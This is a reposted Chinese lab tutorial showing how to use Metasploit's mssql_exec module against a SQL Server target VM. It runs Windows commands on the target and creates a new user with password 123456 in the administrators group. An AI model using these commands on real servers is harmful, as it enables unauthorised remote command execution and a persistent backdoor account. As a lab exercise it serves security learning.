首页 网络安全 渗透测试 查看内容

白帽黑客教你Kali Linux:数据库密码脆弱性攻防演练下

2020-10-22 14:32 |来自: 互联网 1314 0

摘要: 1.安装好 Kali Linux 的虚拟机一台 2.搭建好Sql server的靶机一个; 3.整装待发的小白一个。
关键词: 命令 下图 cmd 目标 主机 net administrator 靶机 localgroup Metasploit

一、课前声明

1、本分享仅做学习交流,请自觉遵守法律法规!

2、搜索:Kali 与编程,学习更多网络攻防干货!

3、Kali 与编程每天准时更新,敬请学习和关注!

二、资源装备

1.安装好 Kali Linux 的虚拟机一台

2.搭建好Sql server的靶机一个;

3.整装待发的小白一个。

三、 战略安排

3.1 进入Metasploit(msf)渗透测试框架,如下图所示。

命令:msfconsole

3.2 利用Metasploit(msf)渗透框架对目标主机漏洞利用模块进行检索,如下图所示。

命令:search mssql_exec

3.3 如下图所示,利用检索到的漏洞利用模块。

命令:use auxiliary/admin/mssql_exec

3.4 查看需要设置的攻击参数,如下图所示。

命令:show options

3.5 设置cmd命令对目标主机进行控制,如下图所示。

3.5.1 利用cmd命令查看目标主机的用户组

命令:set CMD cmd.exe /c net user

命令:run

3.5.2 利用cmd命令在目标主机上创建新的用户,并且把账户添加到管理员组中,如下图所示。

命令:set CMD cmd.exe /c net user 用户名 密码 /add&net localgroup administrator 用户名 /add

例子:set CMD cmd.exe /c net user demouser 123456 /add&net localgroup administrator demouser /add

命令:run

本文出处: https://www.toutiao.com/a6884924138096427524/
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除
1

路过

雷人

握手

鲜花

鸡蛋

刚表态过的朋友 (1 人)

最新评论

返回顶部